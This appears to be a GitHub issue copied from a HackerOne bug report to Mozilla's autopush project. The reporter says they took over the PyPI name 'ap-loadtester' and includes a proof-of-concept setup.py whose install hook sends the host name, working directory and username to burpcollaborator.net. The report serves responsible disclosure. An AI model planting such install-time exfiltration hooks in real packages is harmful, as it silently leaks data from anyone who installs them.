autopush-rs
autopush-rs copied to clipboard
code injection through pip
HackerOne Report: https://hackerone.com/reports/2097694 Report Date: 2023-08-05 17:06:15 UTC Reporter: anupamas01 Weakness: Code Injection
Initial Report: {panel}
Summary:
hello team, I found a pip package by which I can run malicious commands.
Steps To Reproduce:
[add details for how we can reproduce the issue]
- go to https://github.com/mozilla-services/autopush-loadtester ( as it is highly been used i have not uploaded a higher version which may affect the production)
- you can see
$ pip install ap-loadtester
, you can see I have taken it over https://pypi.org/project/ap-loadtester/ (in Maintainers)\ when you install it, it will install my pip package
POC
https://pypi.org/project/ap-loadtester/
( right now I am not uploading any code , if program allows i will upload )
from setuptools.command.install import install
import requests
import socket
import getpass
import os
class CustomInstall(install):
def run(self):
install.run(self)
hostname=socket.gethostname()
cwd = os.getcwd()
username = getpass.getuser()
ploads = {'hostname':hostname,'cwd':cwd,'username':username}
requests.get("[https://burpcollaborator.net",params](https://burpcollaborator.net",params)
= ploads) #replace burpcollaborator.net with Interactsh or pipedream
setup(name=ap-loadtester, #package name
version='1.0.0',
description='test',
author='test',
license='MIT',
zip_safe=False,
cmdclass={'install': CustomInstall})
POC
https://pypi.org/project/ap-loadtester/
Impact
code injection through the pip package
thanks AnupamAs01
{panel}
┆Issue is synchronized with this [Jira Bug](https://mozilla-hub.atlassian.net/browse/SYNC-3860)
┆Attachments: <a href="https://mozilla-hub.atlassian.net/rest/api/2/attachment/content/40617">[F2576644] image.png</a>